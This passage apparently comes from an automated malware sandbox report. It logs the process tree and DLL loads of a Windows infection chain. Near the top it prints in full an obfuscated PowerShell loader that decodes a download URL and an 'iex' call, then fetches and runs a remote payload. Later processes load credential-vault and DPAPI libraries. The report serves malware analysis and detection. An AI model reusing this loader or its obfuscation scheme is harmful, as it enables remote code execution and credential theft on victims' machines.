ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st pJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st pJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
